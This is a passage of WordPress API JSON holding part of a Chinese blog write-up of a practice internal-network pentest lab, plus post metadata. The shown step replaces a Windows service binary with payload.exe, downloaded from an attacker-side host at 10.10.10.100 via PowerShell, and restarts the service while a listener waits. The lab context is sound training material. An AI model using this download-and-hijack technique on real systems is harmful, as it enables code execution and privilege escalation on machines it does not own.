src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688626162-1-1024x418.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u628a\u521a\u521a\u5386\u53f2\u6587\u4ef6\u91cc\u7684\u547d\u4ee4\u590d\u5236\u4e0b\u6765\u6539\u4e00\u4e0b <code>(new-object net.webclient).downloadfile('<a href=\"http:\/\/10.10.10.100:8002\/payload.exe','c:\\program\">http:\/\/10.10.10.100:8002\/payload.exe','c:\\program<\/a> files\\goservice\\service.exe')<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688626299-\u5fae\u4fe1\u622a\u56fe_20230704102324-1024x216.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688626299-\u5fae\u4fe1\u622a\u56fe_20230704102324-1024x216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>.100 \u5f00\u542f\u76d1\u542c\uff0c\u7136\u540e .201 \u8fd0\u884c <code>sc.exe start GoService<\/code> \u5373\u53ef<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688626316-\u5fae\u4fe1\u622a\u56fe_20230706143541-1024x273.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688626316-\u5fae\u4fe1\u622a\u56fe_20230706143541-1024x273.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>","protected":false},"excerpt":{"rendered":"\u5185\u7f51\u9776\u573a\u6253\u5f97\u4e0d\u591a\uff0c\u78b0\u5de7\u5728 \u201c \u5228\u6d1e\u5b89\u5168\u56e2\u961f\u201d \u516c\u4f17\u53f7\u4e0a\u770b\u89c1\u4e86\u4e00\u4e2a\u7ec3\u4e60\u9776\u573a\uff0c\u78d5\u78d5\u7eca\u7eca\u505a\u4e86\u4e0b\u6765\uff0c\u6709\u7684\u5730\u65b9\u8fd8\u4e0d\u662f\u5f88\u6e05 [&hellip;]","protected":false},"author":1,"featured_media":677,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[26,34],"tags":[20],"class_list":["post-675","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-study","category-34","tag-20"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2023\/06\/111.webp?fit=1280%2C800","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/675","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=675"}],"version-history":[{"count":22,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/675\/revisions"}],"predecessor-version":[{"id":747,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/675\/revisions\/747"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/677"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=675"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=675"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=675"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}